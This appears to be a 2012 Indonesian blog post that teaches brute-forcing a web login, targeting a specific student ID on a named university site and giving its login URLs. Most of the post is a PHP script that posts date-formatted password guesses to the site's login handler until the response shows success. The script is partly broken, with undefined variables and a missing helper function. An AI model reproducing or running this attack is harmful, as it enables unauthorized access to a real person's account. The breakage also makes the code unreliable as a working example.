Thursday, 3 May 2012

Bobolr Password Web dengan PHP

Dalam contoh kasus kali ini, saya mencoba untuk bongkar password salah satu mahasiswa dengan nomor induknya "11022924", yang berada pada situs www.bsi.ac.id. Lalu, apa yang pertama kita lakukan ? 1. Akses kesitus ini : http://bsi.ac.id/login_d1d3_1.php , kamu bisa ambil contoh apa aja... 2. Saat itu kamu akan lihat form loginnya...., saatnya kamu harus mengetahui variabel2 apa yang dikirim, dengan mengetahui source webnya... caranya : klik menu bar "VIEW" ==> "SOURCE"... (UNTUK Internet Explorer). Contoh misalnya sbg berikut :
NAma : Password : NAma :
Yang ber warna merah adalah nama variabel sedangkan berwarna biru adalah file target dimana data variabel dikirimkan. Kamu harus mengubahnya ke alamat absolut situsnya. Contohnya : bsi.ac.id/ceceklog.php 3. Oke, sudah mengetahui variabelnya... kamu harus cocokkan/mengerti mana yang merupakan variabel username, password dan lain sebagainya... agar bisa mengikuti langkah ke 4. 4. Oke saatnya listing : : PASSWORD TEST : : > tampubolon.com/contoh/coba.jsp $urltarget="bsi.ac.id/ceceklog.php"; // Set variabel tgl text awal $tgl="00/00/00"; // Test!!! while($tgl!=$akhir) { $hf=(strlen($hawal)>1 ? $hawal : "0".$hawal); $bf=(strlen($bawal)>1 ? $bawal : "0".$bawal); $passtest=$tawal."-".$bf."-".$hf; // format passwordnya YYYY-MM-DD $datatest=post($urltarget ,"user=11022924&pass=".$passtest."&aksi=Login"); // Tampung headernya... // Cek k'lo ada string yg diinginkan... if(substr_count($datatest, "index_mhs.php")>0) // PASSWORD OK { echo "COBA PASSWORD : ".$passtest." HASIL : BERHASIL
\n\n"; exit; }else{ // BUKAN PASSWORD echo "COBA PASSWORD : ".$passtest." HASIL : GAGAL
\n"; } $tgl=$hawal."/".$bawal."/".$tawal; // Biar ngga loop trus menerus // matematika untuk tanggal if($hawal>30) { if($bawal>11) { $tawal+=1; $bawal=0; } $bawal+=1; $hawal=0; } $hawal+=1; } ?> Lihat Artikel Asli di http://tomat1610.blogspot.com

No comments:

Post a Comment

Berikan Komentar Anda Agar Menjadi Lebih Baik